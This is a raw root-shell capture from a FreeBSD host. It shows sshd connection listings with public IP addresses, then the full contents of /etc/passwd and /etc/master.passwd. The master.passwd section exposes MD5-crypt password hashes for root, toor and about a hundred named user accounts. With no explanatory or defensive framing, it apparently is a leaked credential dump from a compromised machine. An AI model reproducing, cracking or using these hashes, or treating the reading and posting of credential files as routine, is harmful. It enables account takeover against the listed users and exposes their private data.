sshd 60382 root 3u IPv4 0xc50a51d0 0t0 TCP 72.20.28.248:ssh->188.52.81.126:10696 (ESTABLISHED)
sshd 64492 root 3u IPv6 0xcc1883a0 0t0 TCP *:ssh (LISTEN)
sshd 64492 root 4u IPv4 0xc970d3a0 0t0 TCP *:ssh (LISTEN)
sshd 74777 root 3u IPv4 0xc9dd8570 0t0 TCP 72.20.28.248:ssh->66.229.253.149:27655 (ESTABLISHED)
sshd 74779 ioplex 3u IPv4 0xc9dd8570 0t0 TCP 72.20.28.248:ssh->66.229.253.149:27655 (ESTABLISHED)
sshd 74779 ioplex 7u IPv4 0xc9f58cb0 0t0 TCP 127.0.0.1:56073->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 8u IPv4 0xc91ff1d0 0t0 TCP 127.0.0.1:57500->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 9u IPv4 0xc6230910 0t0 TCP 127.0.0.1:64660->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 10u IPv4 0xc9a37ae0 0t0 TCP 127.0.0.1:49761->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 12u IPv4 0xc9a93740 0t0 TCP 127.0.0.1:64920->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 13u IPv4 0xc97d21d0 0t0 TCP 127.0.0.1:52350->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 14u IPv4 0xc5c30000 0t0 TCP 127.0.0.1:51650->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 15u IPv4 0xca1cf1d0 0t0 TCP 127.0.0.1:49153->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 16u IPv4 0xcc1731d0 0t0 TCP 127.0.0.1:51808->127.0.0.1:48259 (ESTABLISHED)
sshd 74779 ioplex 17u IPv4 0xcc592cb0 0t0 TCP 127.0.0.1:53451->127.0.0.1:48259 (ESTABLISHED)
[root@velocity:~]#
[root@velocity:/var/run]# cat /etc/passwd
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/usr/local/bin/bash
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
nsc:*:1001:0:User &:/home/nsc:/bin/sh
sysc:*:1002:1002:User &:/home/sysc:/usr/local/bin/bash
vividbreeze:*:1003:1003:User &:/home/vividbreeze:/usr/local/bin/bash
sharpie:*:1036:1036:User &:/home/sharpie:/usr/local/bin/bash
cappy57:*:1038:1038:User &:/home/cappy57:/usr/local/bin/bash
zoo:*:1039:1039:User &:/home/zoo:/usr/local/bin/bash
dark:*:1041:1041:User &:/home/dark:/usr/local/bin/bash
evino:*:1042:1042:User &:/home/evino:/usr/local/bin/bash
dano30:*:1043:1043:User &:/home/dano30:/usr/local/bin/bash
daali:*:1044:1044:User &:/home/daali:/usr/local/bin/bash
skit:*:1045:1045:User &:/home/skit:/usr/local/bin/bash
l33t:*:1047:1047:User &:/home/l33t:/usr/local/bin/bash
tlm:*:1049:1049:User &:/home/tlm:/usr/local/bin/bash
itzkorn:*:1051:1051:User &:/home/itzkorn:/usr/local/bin/bash
groove:*:1052:1052:User &:/home/groove:/usr/local/bin/bash
en0prcv:*:1054:1054:User &:/home/en0prcv:/usr/local/bin/bash
poolboy:*:1055:1055:User &:/home/poolboy:/usr/local/bin/bash
bollox:*:1058:1058:User &:/home/bollox:/usr/local/bin/bash
vamp:*:1059:1059:User &:/home/vamp:/usr/local/bin/bash
genosyde:*:1060:1060:User &:/home/genosyde:/usr/local/bin/bash
y2j:*:1061:1061:User &:/home/y2j:/usr/local/bin/bash
katsst:*:1062:1062:User &:/home/katsst:/usr/local/bin/bash
nexxtea:*:1063:1063:User &:/home/nexxtea:/usr/local/bin/bash
quinn:*:1064:1064:User &:/home/quinn:/usr/local/bin/bash
crash:*:1066:1066:User &:/home/crash:/usr/local/bin/bash
safety:*:1067:1067:User &:/home/safety:/usr/local/bin/bash
crazyl:*:1069:1069:User &:/home/crazyl:/usr/local/bin/bash
tarawa:*:1071:1071:User &:/home/tarawa:/usr/local/bin/bash
athemp:*:1077:1077:User &:/home/athemp:/usr/local/bin/bash
cazz1961:*:1087:1087:User &:/home/cazz1961:/usr/local/bin/bash
vitalrbj:*:1088:1088:User &:/home/vitalrbj:/usr/local/bin/bash
digitalman:*:1090:1090:User &:/home/digitalman:/usr/local/bin/bash
timgor:*:1096:1096:User &:/home/timgor:/usr/local/bin/bash
techi3:*:1098:1098:User &:/home/techi3:/usr/local/bin/bash
apo:*:1099:1099:User &:/home/apo:/usr/local/bin/bash
blkgraz:*:1100:1100:User &:/home/blkgraz:/usr/local/bin/bash
jamesn:*:1101:1101:User &:/home/jamesn:/usr/local/bin/bash
sacred:*:1103:1103:User &:/home/sacred:/usr/local/bin/bash
jschultk:*:1104:1104:User &:/home/jschultk:/usr/local/bin/bash
narcissu:*:1105:1105:User &:/home/narcissu:/usr/local/bin/bash
neohax:*:1115:1115:User &:/home/neohax:/usr/local/bin/bash
ceejay:*:1119:1119:User &:/home/ceejay:/usr/local/bin/bash
wolf:*:1126:1126:User &:/home/wolf:/usr/local/bin/bash
warlordz:*:1129:1129:User &:/home/warlordz:/usr/local/bin/bash
hh360:*:1130:1130:User &:/home/hh360:/usr/local/bin/bash
simonbh:*:1133:1133:User &:/home/simonbh:/usr/local/bin/bash
crazie:*:1134:1134:User &:/home/crazie:/bin/tcsh
burnt:*:1136:1136:User &:/home/burnt:/usr/local/bin/bash
xckx:*:1139:1139:User &:/home/xckx:/bin/sh
f3d0r:*:1140:1140:User &:/home/f3d0r:/usr/local/bin/bash
khicks:*:1145:1145:User &:/home/khicks:/usr/local/bin/bash
schlomer:*:1147:1147:User &:/home/schlomer:/usr/local/bin/bash
nodex:*:1153:1153:User &:/home/nodex:/usr/local/bin/bash
crrj13:*:1155:1155:User &:/home/crrj13:/usr/local/bin/bash
dravas:*:1157:1157:User &:/home/dravas:/usr/local/bin/bash
sinistro:*:1170:1170:User &:/home/sinistro:/usr/local/bin/bash
izedd:*:1172:1172:User &:/home/izedd:/usr/local/bin/bash
chevym4n:*:1174:1174:User &:/home/chevym4n:/usr/local/bin/bash
edgein:*:1175:1175:User &:/home/edgein:/usr/local/bin/bash
shoes:*:1178:1178:User &:/home/shoes:/usr/local/bin/bash
zenchi:*:1179:1179:User &:/home/zenchi:/usr/local/bin/bash
darien9:*:1180:1180:User &:/home/darien9:/usr/local/bin/bash
reaper90:*:1181:1181:User &:/home/reaper90:/usr/local/bin/bash
bnoel:*:1183:1183:User &:/home/bnoel:/usr/local/bin/bash
hts:*:1188:1188:User &:/home/hts:/usr/local/bin/bash
hw4tbnc:*:1190:1190:User &:/home/hw4tbnc:/usr/local/bin/bash
xavi:*:1192:1192:User &:/home/xavi:/usr/local/bin/bash
kruapra:*:1193:1193:User &:/home/kruapra:/usr/local/bin/bash
bbblade1:*:1197:1197:User &:/home/bbblade1:/usr/local/bin/bash
oby1:*:1198:1198:User &:/home/oby1:/usr/local/bin/bash
ltootle:*:1199:1199:User &:/home/ltootle:/usr/local/bin/bash
zime:*:1200:1200:User &:/home/zime:/usr/local/bin/bash
ksafusi:*:1202:1202:User &:/home/ksafusi:/usr/local/bin/bash
methanl:*:1205:1205:User &:/home/methanl:/usr/local/bin/bash
anux:*:1206:1206:User &:/home/anux:/usr/local/bin/bash
tea:*:1207:1207:User &:/home/tea:/usr/local/bin/bash
ircjaymz:*:1210:1210:User &:/home/ircjaymz:/usr/local/bin/bash
coolcat:*:1211:1211:User &:/home/coolcat:/usr/local/bin/bash
zeepysea:*:1213:1213:User &:/home/zeepysea:/usr/local/bin/bash
darkevil:*:1214:1214:User &:/home/darkevil:/usr/local/bin/bash
grindey:*:1215:1215:User &:/home/grindey:/usr/local/bin/bash
silver15:*:1216:1216:User &:/home/silver15:/usr/local/bin/bash
smash:*:1218:1218:User &:/home/smash:/usr/local/bin/bash
reznik:*:1219:1219:User &:/home/reznik:/usr/local/bin/bash
omelette:*:1222:1222:User &:/home/omelette:/usr/local/bin/bash
mimik0r:*:1223:1223:User &:/home/mimik0r:/usr/local/bin/bash
owine:*:1224:1224:User &:/home/owine:/usr/local/bin/bash
manboo:*:1225:1225:User &:/home/manboo:/usr/local/bin/bash
corley:*:1231:1231:User &:/home/corley:/usr/local/bin/bash
sqd:*:1233:1233:User &:/home/sqd:/usr/local/bin/bash
mooo:*:1234:1234:User &:/home/mooo:/usr/local/bin/bash
comedy:*:1235:1235:User &:/home/comedy:/usr/local/bin/bash
lynx:*:1236:1236:User &:/home/lynx:/usr/local/bin/bash
prodigy:*:1237:1237:User &:/home/prodigy:/usr/local/bin/bash
chrirc:*:1238:1238:User &:/home/chrirc:/usr/local/bin/bash
lyhne1:*:1242:1242:User &:/home/lyhne1:/usr/local/bin/bash
percott1:*:1243:1243:User &:/home/percott1:/usr/local/bin/bash
djspark:*:1244:1244:User &:/home/djspark:/usr/local/bin/bash
ac1115:*:1246:1246:User &:/home/ac1115:/usr/local/bin/bash
asriel:*:1247:1247:User &:/home/asriel:/usr/local/bin/bash
devil:*:1248:1248:User &:/home/devil:/usr/local/bin/bash
lymelyte:*:1249:1249:User &:/home/lymelyte:/usr/local/bin/bash
cmm:*:1250:1250:User &:/home/cmm:/usr/local/bin/bash
nek0o:*:1252:1252:User &:/home/nek0o:/usr/local/bin/bash
baxxta:*:1253:1253:User &:/home/baxxta:/usr/local/bin/bash
bruhaha:*:1254:1254:User &:/home/bruhaha:/usr/local/bin/bash
dv327:*:1258:1258:User &:/home/dv327:/usr/local/bin/bash
voxitize:*:1261:1261:User &:/home/voxitize:/usr/local/bin/bash
own3d:*:1262:1262:User &:/home/own3d:/usr/local/bin/bash
feed:*:1264:1264:User &:/home/feed:/usr/local/bin/bash
yaquis:*:1266:1266:User &:/home/yaquis:/usr/local/bin/bash
bpunux:*:1269:1269:User &:/home/bpunux:/usr/local/bin/bash
skypilot:*:1271:1271:User &:/home/skypilot:/usr/local/bin/bash
blake96:*:1272:1272:User &:/home/blake96:/usr/local/bin/bash
blotch:*:1274:1274:User &:/home/blotch:/usr/local/bin/bash
scouse:*:1275:1275:User &:/home/scouse:/usr/local/bin/bash
mogle3:*:1276:1276:User &:/home/mogle3:/usr/local/bin/bash
ste:*:1277:1277:User &:/home/ste:/usr/local/bin/bash
omgwtf:*:1281:1281:User &:/home/omgwtf:/usr/local/bin/bash
brosb4:*:1283:1283:User &:/home/brosb4:/usr/local/bin/bash
mindben:*:1284:1284:User &:/home/mindben:/usr/local/bin/bash
hixk:*:1286:1286:User &:/home/hixk:/usr/local/bin/bash
omen:*:1287:1287:User &:/home/omen:/usr/local/bin/bash
sakik1:*:1290:1290:User &:/home/sakik1:/usr/local/bin/bash
chriys:*:1291:1291:User &:/home/chriys:/usr/local/bin/bash
jtracy:*:1292:1292:User &:/home/jtracy:/usr/local/bin/bash
roodyk:*:1293:1293:User &:/home/roodyk:/usr/local/bin/bash
qfx:*:1295:1295:User &:/home/qfx:/usr/local/bin/bash
chrisdad:*:1296:1296:User &:/home/chrisdad:/usr/local/bin/bash
rice21:*:1298:1298:User &:/home/rice21:/usr/local/bin/bash
wchan21:*:1299:1299:User &:/home/wchan21:/usr/local/bin/bash
xkelsx:*:1300:1300:User &:/home/xkelsx:/usr/local/bin/bash
jerryste:*:1302:1302:User &:/home/jerryste:/usr/local/bin/bash
pbx:*:1303:1303:User &:/home/pbx:/usr/local/bin/bash
mlh:*:1307:1307:User &:/home/mlh:/usr/local/bin/bash
howell1:*:1308:1308:User &:/home/howell1:/usr/local/bin/bash
djkarl:*:1309:1309:User &:/home/djkarl:/usr/local/bin/bash
subkult:*:1310:1310:User &:/home/subkult:/usr/local/bin/bash
dealer:*:1311:1311:User &:/home/dealer:/bin/sh
cont:*:1312:1312:User &:/home/cont:/usr/local/bin/bash
ircusr:*:1313:1313:User &:/home/ircusr:/usr/local/bin/bash
lordy:*:1314:1314:User &:/home/lordy:/usr/local/bin/bash
chozen1:*:1315:1315:User &:/home/chozen1:/usr/local/bin/bash
nardi:*:1316:1316:User &:/home/nardi:/usr/local/bin/bash
ssaws:*:1317:1317:User &:/home/ssaws:/usr/local/bin/bash
chaos1:*:1318:1318:User &:/home/chaos1:/usr/local/bin/bash
jax66:*:1319:1319:User &:/home/jax66:/usr/local/bin/bash
paleride:*:1320:1320:User &:/home/paleride:/usr/local/bin/bash
kokoryu:*:1321:1321:User &:/home/kokoryu:/usr/local/bin/bash
bluewish:*:1322:1322:User &:/home/bluewish:/usr/local/bin/bash
grumpy:*:1323:1323:User &:/home/grumpy:/usr/local/bin/bash
jaiven:*:1324:1324:jusam69:/home/jaiven:/usr/local/bin/bash
rikt:*:1325:1325:User &:/home/rikt:/usr/local/bin/bash
sal:*:1326:1326:User &:/home/sal:/usr/local/bin/bash
lailoke:*:1327:1327:User &:/home/lailoke:/usr/local/bin/bash
kingzy:*:1328:1328:User &:/home/kingzy:/usr/local/bin/bash
delion1:*:1329:1329:User &:/home/delion1:/usr/local/bin/bash
vietnigh:*:1330:1330:User &:/home/vietnigh:/usr/local/bin/bash
darkuno3:*:1331:1331:User &:/home/darkuno3:/usr/local/bin/bash
mae21:*:1332:1332:User &:/home/mae21:/usr/local/bin/bash
redrum:*:1333:1333:User &:/home/redrum:/usr/local/bin/bash
cpu:*:1334:1334:User &:/home/cpu:/usr/local/bin/bash
cassand:*:1335:1335:User &:/home/cassand:/usr/local/bin/bash
nyakz:*:1336:1336:User &:/home/nyakz:/usr/local/bin/bash
ioplex:*:1337:1337:User &:/home/ioplex:/usr/local/bin/bash
dasboot:*:1338:1338:User &:/home/dasboot:/usr/local/bin/bash
visage:*:1339:1339:User &:/home/visage:/usr/local/bin/bash
brosco:*:1340:1340:User &:/home/brosco:/usr/local/bin/bash
mrts:*:1341:1341:User &:/home/mrts:/usr/local/bin/bash
qberto:*:1342:1342:User &:/home/qberto:/usr/local/bin/bash
kooner:*:1343:1343:User &:/home/kooner:/usr/local/bin/bash
matt:*:1344:1344:User &:/home/matt:/usr/local/bin/bash
alexbb:*:1345:1345:User &:/home/alexbb:/usr/local/bin/bash
psycoz:*:1346:1346:User &:/home/psycoz:/usr/local/bin/bash
brex132:*:1347:1347:User &:/home/brex132:/usr/local/bin/bash
romeo:*:1348:1348:User &:/home/romeo:/usr/local/bin/bash // Luv birdz
pimpinjg:*:1349:1349:pimp:/home/pimpinjg:/usr/local/bin/bash xxx
[root@velocity:/var/run]# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:$1$1/uC7r58$sAPSn.PUGsvyFIu4mcOIF.:0:0::0:0:Charlie &:/root:/usr/local/bin/bash
toor:$1$IuvLkk7/$FgGjVLe5lsy07I5kDUC/T0:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
nsc:$1$IeIWCi46$XUYbzB6VMUjyo3yVDocI20:1001:0::0:0:User &:/home/nsc:/bin/sh
sysc:$1$hiSG4Zk5$DRLSxZFui5GLPwdZoHRXa/:1002:1002::0:0:User &:/home/sysc:/usr/local/bin/bash
vividbreeze:$1$HHTt39fS$BpffLFLjdrdFhiYRiT/oH1:1003:1003::0:0:User &:/home/vividbreeze:/usr/local/bin/bash
sharpie:$1$Z/fby1iX$U.ENzMwNSk.Ak1eEo8cdo1:1036:1036::0:0:User &:/home/sharpie:/usr/local/bin/bash
cappy57:$1$8gQtMpSY$4g39UeywbkYfv4t.BC1T0.:1038:1038::0:0:User &:/home/cappy57:/usr/local/bin/bash
zoo:$1$ikC.1RVM$vaW3geI2tKDiBuvM7/8H1/:1039:1039::0:0:User &:/home/zoo:/usr/local/bin/bash
dark:$1$sGGpg4L4$HYL2DV2DDtJrlDCsIk1fD0:1041:1041::0:0:User &:/home/dark:/usr/local/bin/bash
evino:$1$HDrVvLQn$D1cJvyXZzYWc71dnlB9jl.:1042:1042::0:0:User &:/home/evino:/usr/local/bin/bash
dano30:$1$ilxeqeAX$1.xdaXswIvjWdH4Es8U1U1:1043:1043::0:0:User &:/home/dano30:/usr/local/bin/bash
daali:$1$RIGXxrvu$loyclkpc.AmaZJ6z7RycD0:1044:1044::0:0:User &:/home/daali:/usr/local/bin/bash
skit:$1$YwEZ2Gg3$Mm9v5oPJpRUj5WbHGfiYI.:1045:1045::0:0:User &:/home/skit:/usr/local/bin/bash
l33t:$1$BuBrfoCp$YgayOH.nAWmkTT.kOi0340:1047:1047::0:0:User &:/home/l33t:/usr/local/bin/bash
tlm:$1$8qySBjLd$UvMl1Qi37S6HzW5.fgugN.:1049:1049::0:0:User &:/home/tlm:/usr/local/bin/bash
itzkorn:$1$WvELNoD3$FIKMODlyhN1RIxuNyM8gV0:1051:1051::0:0:User &:/home/itzkorn:/usr/local/bin/bash
groove:$1$U.nL9FBx$mxac7bOw5AcjMobjytLqT.:1052:1052::0:0:User &:/home/groove:/usr/local/bin/bash
en0prcv:$1$ml9.a1tV$4ysE/.CdLiEAYOtG6IzW2.:1054:1054::0:0:User &:/home/en0prcv:/usr/local/bin/bash
poolboy:$1$A5NPQSxN$X./Geraa6C3fLjbGv2j9h.:1055:1055::0:0:User &:/home/poolboy:/usr/local/bin/bash
bollox:$1$1CezJarC$OZn7O/jcjFQHzMxK80L0C0:1058:1058::0:0:User &:/home/bollox:/usr/local/bin/bash
vamp:$1$OdDSbp3S$VEOws1l9o/qV0i6Y2xiHC1:1059:1059::0:0:User &:/home/vamp:/usr/local/bin/bash
genosyde:$1$izdrjKv1$qyo9BMhEB0kCGUinWl/dr1:1060:1060::0:0:User &:/home/genosyde:/usr/local/bin/bash
y2j:$1$bzHRbq3a$04iFxtmEVuPEXbClBbUIM.:1061:1061::0:0:User &:/home/y2j:/usr/local/bin/bash
katsst:$1$XkKWd/C/$gu0Kf6fWZZylSX2kvZP0y/:1062:1062::0:0:User &:/home/katsst:/usr/local/bin/bash
nexxtea:$1$qiplCuym$aOcIJrBN7.ahK8fRpc5F.1:1063:1063::0:0:User &:/home/nexxtea:/usr/local/bin/bash
quinn:$1$WjY3BCta$pOR9R53lRcsn9uMHRj5mO.:1064:1064::0:0:User &:/home/quinn:/usr/local/bin/bash
crash:$1$ptyaMrnL$LfpP.5IoEVl6ASBLrZ7sw0:1066:1066::0:0:User &:/home/crash:/usr/local/bin/bash
safety:$1$IdkZ.lW5$31zeswPr/v9Gwn6qZTDt3.:1067:1067::0:0:User &:/home/safety:/usr/local/bin/bash
crazyl:$1$b6KKD5V2$0X.DEpoT8dnAV.2tkkSSQ/:1069:1069::0:0:User &:/home/crazyl:/usr/local/bin/bash
tarawa:$1$kogmLs28$TVHG.5aER1x3a/6fks6fv1:1071:1071::0:0:User &:/home/tarawa:/usr/local/bin/bash
athemp:*LOCKED*$1$yNQrxvZa$ndX97oZnZ.P29pYdLUDUX1:1077:1077::0:0:User &:/home/athemp:/usr/local/bin/bash
cazz1961:$1$tNbxmjSZ$0nG7YCqOLZZBu.rdFYNXg1:1087:1087::0:0:User &:/home/cazz1961:/usr/local/bin/bash
vitalrbj:$1$obXp9UmW$ASCrtvpO6SSYxAtC9/BgN1:1088:1088::0:0:User &:/home/vitalrbj:/usr/local/bin/bash
digitalman:$1$.uafD1mk$ZKCSAxQX05Bt8CR1vD0bI.:1090:1090::0:0:User &:/home/digitalman:/usr/local/bin/bash
timgor:$1$fV/Hdpqj$2sjgaBZs6L4cWkD8coayp1:1096:1096::0:0:User &:/home/timgor:/usr/local/bin/bash
techi3:$1$ynI1L3YX$lTwOx8CeuiBAbtCq2rXG2.:1098:1098::0:0:User &:/home/techi3:/usr/local/bin/bash
apo:$1$lgsvmKYS$kJ/vrigrNVEXtw8V3qA3K/:1099:1099::0:0:User &:/home/apo:/usr/local/bin/bash
blkgraz:$1$5q0v8Hnd$zACUwgVPinssVcu8I8Ouf0:1100:1100::0:0:User &:/home/blkgraz:/usr/local/bin/bash
jamesn:$1$0ZLHnfT0$mF2GuCKO5WcYOceupFee0/:1101:1101::0:0:User &:/home/jamesn:/usr/local/bin/bash
sacred:*LOCKED*$1$QBsL9qE8$9gAsuW0OK2OH2.UfBBD4n/:1103:1103::0:0:User &:/home/sacred:/usr/local/bin/bash
jschultk:$1$Ghq0DYN4$XO2MmdjnPzIkQT0nWFNi.0:1104:1104::0:0:User &:/home/jschultk:/usr/local/bin/bash
narcissu:$1$yPWcgSV9$K6b21WLz8VeolcK9x26mW1:1105:1105::0:0:User &:/home/narcissu:/usr/local/bin/bash
neohax:$1$BYHxfesg$7Vu8ktsSVk6FGgSMczVQG.:1115:1115::0:0:User &:/home/neohax:/usr/local/bin/bash
ceejay:*LOCKED*$1$sDhV37Ee$hKD5Ycjby19mEG3NYYIYo0:1119:1119::0:0:User &:/home/ceejay:/usr/local/bin/bash
wolf:$1$.MGFDwFE$jy3l9ohTEH1ykRgpGM1Q6.:1126:1126::0:0:User &:/home/wolf:/usr/local/bin/bash
warlordz:$1$uvxD1gWl$4fRmw..Z.wViXzw28Jlmu1:1129:1129::0:0:User &:/home/warlordz:/usr/local/bin/bash
hh360:$1$BRAG0RtG$iXnTwrCohVK8HOGAJohy10:1130:1130::0:0:User &:/home/hh360:/usr/local/bin/bash
simonbh:$1$97E2uBin$73LaITM/WELCrMAt682Z21:1133:1133::0:0:User &:/home/simonbh:/usr/local/bin/bash
crazie:$1$myYGtQTs$U52cfuiCDyksyWJbM55dx.:1134:1134::0:0:User &:/home/crazie:/bin/tcsh
burnt:$1$ykBWG.ZC$dfTn3m8koWfmAY1QHpx1R0:1136:1136::0:0:User &:/home/burnt:/usr/local/bin/bash
xckx:*LOCKED*$1$7mjlMrC7$j/ZtDnWpTeAgxJl4jrPPV1:1139:1139::0:0:User &:/home/xckx:/bin/sh
f3d0r:*LOCKED*$1$9K1FP6Bz$KDznsL2Eh9l3ljez.qoif/:1140:1140::0:0:User &:/home/f3d0r:/usr/local/bin/bash
khicks:$1$VzHaJyrH$0m/NnKHiTrFY..8zhbaLq0:1145:1145::0:0:User &:/home/khicks:/usr/local/bin/bash
schlomer:*LOCKED*$1$iBBpx5BZ$LjFBxe10UsUGETx8AZfiP0:1147:1147::0:0:User &:/home/schlomer:/usr/local/bin/bash
nodex:$1$Q518nSu7$4WszHno7Bi4NymOySGq1a0:1153:1153::0:0:User &:/home/nodex:/usr/local/bin/bash
crrj13:$1$m4PUs5Ia$3tsRV7DZyj3fLxjHK9.AX0:1155:1155::0:0:User &:/home/crrj13:/usr/local/bin/bash
dravas:$1$hTXK1nl7$0WoSi2Md.l7h/eM2uQCp5.:1157:1157::0:0:User &:/home/dravas:/usr/local/bin/bash
sinistro:$1$rt7kcwvQ$xe2ixfObxehOHLzoILyVF.:1170:1170::0:0:User &:/home/sinistro:/usr/local/bin/bash
izedd:*LOCKED*$1$D5UKCjr0$e9soJXXTyUG1Xf5eHHDuZ/:1172:1172::0:0:User &:/home/izedd:/usr/local/bin/bash
chevym4n:$1$K1uoGWl/$rZLwDgLIgr.Xni315uVpX.:1174:1174::0:0:User &:/home/chevym4n:/usr/local/bin/bash
edgein:$1$2Vs.w9gS$mvylnKn4jxg6lsitAbz.i.:1175:1175::0:0:User &:/home/edgein:/usr/local/bin/bash
shoes:$1$e.WxvF9e$UR5G4Q4zBbgMYaRcvKR3L/:1178:1178::0:0:User &:/home/shoes:/usr/local/bin/bash
zenchi:$1$4YSeHXDW$0/Y40Q9iuLRgd0IJKQucc.:1179:1179::0:0:User &:/home/zenchi:/usr/local/bin/bash
darien9:$1$vzP7ScLf$c/x7.w4a8hLqcy/cm.3uk1:1180:1180::0:0:User &:/home/darien9:/usr/local/bin/bash
reaper90:*LOCKED*$1$RdwnqlVZ$u0yfgSk8FCTKkzDb.n3gM1:1181:1181::0:0:User &:/home/reaper90:/usr/local/bin/bash
bnoel:$1$drKh3ET3$.V5pp0CrLCNjMiPuKJxnY1:1183:1183::0:0:User &:/home/bnoel:/usr/local/bin/bash
hts:$1$84Ss/lv8$b51Gx1URnSeNK63ZO8kNZ1:1188:1188::0:0:User &:/home/hts:/usr/local/bin/bash
hw4tbnc:$1$Vh3/g6US$cPnpGhNkNG9BWvCQ3t2Yz/:1190:1190::0:0:User &:/home/hw4tbnc:/usr/local/bin/bash
xavi:$1$9xxNvzQF$drSUfEtQS.QXN1BbuSZAQ/:1192:1192::0:0:User &:/home/xavi:/usr/local/bin/bash
kruapra:$1$Nbcjv9YC$N8ePQ6PSdQHF0U/DKkrkh0:1193:1193::0:0:User &:/home/kruapra:/usr/local/bin/bash
bbblade1:$1$3QdkfReN$LAGYA1xhqAuhcTw0fJWsl0:1197:1197::0:0:User &:/home/bbblade1:/usr/local/bin/bash
oby1:$1$GkQaLc30$6DXwEhSd9QSeDF5FjAVTB0:1198:1198::0:0:User &:/home/oby1:/usr/local/bin/bash
ltootle:$1$QGrHDsUo$Wl.6N3Nm9ev1dK58x.e80/:1199:1199::0:0:User &:/home/ltootle:/usr/local/bin/bash
zime:$1$uiS1oy.Q$WiVC7b9esN7u4IQw9qrsl0:1200:1200::0:0:User &:/home/zime:/usr/local/bin/bash
ksafusi:$1$hEuXZPjD$AxW7YdBYaTfraRpTuLhhs.:1202:1202::0:0:User &:/home/ksafusi:/usr/local/bin/bash
methanl:$1$DDefrWsW$uVtJKR20EYhnrGhL2lgAM0:1205:1205::0:0:User &:/home/methanl:/usr/local/bin/bash
anux:$1$MjMKgFJP$Db/H.GWM0F4V8y6aESFx9/:1206:1206::0:0:User &:/home/anux:/usr/local/bin/bash
tea:$1$XsdcVMWd$6zKH0gChUzxwFW9JWohhU0:1207:1207::0:0:User &:/home/tea:/usr/local/bin/bash
ircjaymz:$1$OQn.DXif$.CQTkWt2WMacpsLiIzTFN/:1210:1210::0:0:User &:/home/ircjaymz:/usr/local/bin/bash
coolcat:$1$Oylm8zdT$1fJ9FuOxsLixvN0Mvi7gv1:1211:1211::0:0:User &:/home/coolcat:/usr/local/bin/bash
zeepysea:$1$3eGKEHR9$zOgqVHLQHdZVHWxVuNJZG0:1213:1213::0:0:User &:/home/zeepysea:/usr/local/bin/bash
darkevil:$1$45g22hpl$DdFBwycNzL3o9D./PKHzf1:1214:1214::0:0:User &:/home/darkevil:/usr/local/bin/bash
grindey:$1$.Y3kkIHc$kKp8DefYIdeekSzixAV4f0:1215:1215::0:0:User &:/home/grindey:/usr/local/bin/bash
silver15:$1$tb0VvKDF$c0SYfPvgceRpkYvTeLE43/:1216:1216::0:0:User &:/home/silver15:/usr/local/bin/bash
smash:$1$jNnzzwU.$p5P3qiiQdK8fh22y8pM2k.:1218:1218::0:0:User &:/home/smash:/usr/local/bin/bash
reznik:$1$NB.AbeQB$woH82mNch0lgffXyGchAU/:1219:1219::0:0:User &:/home/reznik:/usr/local/bin/bash
